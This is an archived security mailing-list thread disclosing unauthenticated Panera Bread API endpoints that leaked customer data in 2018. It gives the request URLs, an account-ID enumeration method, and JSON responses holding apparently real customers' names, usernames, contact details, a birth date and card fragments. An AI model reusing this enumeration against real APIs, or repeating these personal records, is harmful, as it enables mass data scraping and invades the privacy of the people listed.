[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <5AC79112.5000204@keck.us>
Date: Fri, 6 Apr 2018 10:24:02 -0500
From: Cornelius Keck <insecure@...k.us>
To: "(RS) Tyler Schroder" <redorhcs@...coded.com>,
Jack Beanstalk <pnrabrdthrwy@...il.com>,
"fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] Massive Breach in Panera Bread
The fact that this port is not only still open, but also returns a
well-formed response, is a concern. Of course they could just return
that string, and keep a list of whoever is trying to talk to that port.
(RS) Tyler Schroder wrote:
> A correction seems to be issued for both endpoints, POC links are returning
> "INVALID_SESSION". Might still be breakable given some time, but something
> tells me they're getting a lot of free pentesting right now :)
>
> R. S. Tyler Schroder
>
> -----Original Message-----
> From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf
> Of Jack Beanstalk
> Sent: Monday, April 2, 2018 3:43 PM
> To: fulldisclosure@...lists.org
> Subject: [FD] Massive Breach in Panera Bread
>
> 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7
>
> I'd like to report a security vulnerability in Panera Bread's web
> application. There is a publicly available, completely unauthenticated API
> endpoint that allows anyone to access the following information about anyone
> who has ever signed up for an account to order food from Panera Bread:
>
> 1. Username
>
> 2. First and last name
>
> 3. Email address
>
> 4. Phone number
>
> 5. Birthday
>
> 6. Last four digits of saved credit card number
>
> 7. Saved home address
>
> 8. Social account integration information
>
> 9. Saved user food preferences and dietary restrictions
>
> Here are the API endpoints which you can use to verify this information:
>
> 1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000
>
> This returns the following JSON:
>
> {"accounts": [{"username":"denys","name":"romona
> ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@...mail.com","name
> ":"Marie
> Mulcahy","cardNumber":"********5527"},{"username":"fenrny@....com","name":"F
> B","cardNumber":"********7921"},{"username":"sabooky1@...oo.com","name":"C
> Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg
> e
> Alcalde","cardNumber":"********6129"},{"username":"ktennister37@....com","na
> me":"Kei
> Kino","cardNumber":"********6061"},{"username":"gettingbetter812@...oo.com",
> "name":"jan
> jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny
> poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo
> ianello","cardNumber":"********8386"},{"username":"dblaperch@....com","name"
> :"Deborah
> LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@...online.net","
> name":"sadie
> bagnoni","cardNumber":"********5144"},{"username":"arsbreva@...mail.com","na
> me":"Marea
> needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT
> ESSA
> SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet
> h
> forlenzo","cardNumber":"********7085"},{"username":"jue-95@...mail.com","nam
> e":"juline
> G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo
> Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur
> hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise
> longua","cardNumber":"********0102"},{"username":"homestead19-86@....com","n
> ame":"Sandra
> Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia
> fulchek","cardNumber":"********2654"}]}
>
> Note that you can look up usernames/email addresses for Panera Bread
> accounts if you know the target's phone number. This returns the
> username/email address and last four digits of the saved credit card of
> every user who has ever signed up with that phone number.
>
> 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194
>
> This returns the following JSON:
>
> {"customerId":7382194,"username":"abcascio@....net","firstName":"Anthony","l
> astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23
> 860763,"emailAddress":"abcascio@....net","emailType":"Personal","isDefault":
> true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber"
> :"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"
> name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru
> e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f
> alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa
> lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user
> Preferences":{"foodPreferences":[{"code":3,"displayName":"Low
> Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with
> family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa
> me":"Reward
> Reminders & Expiration
> Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ
> ayName":"Panera
> Bread Updates & Special
> Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio
> nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2
> ,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions"
> :{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[
> ]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]}
>
> In this context, "7382194" is the user's account ID. Panera Bread uses
> sequential integers for account IDs, which means that if your goal is to
> gather as much information as you can instead about someone, you can simply
> increment through the accounts and collect as much as you'd like, up to and
> including the entire database.
>
> Hopefully they'll fix this if it gets enough attention.
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists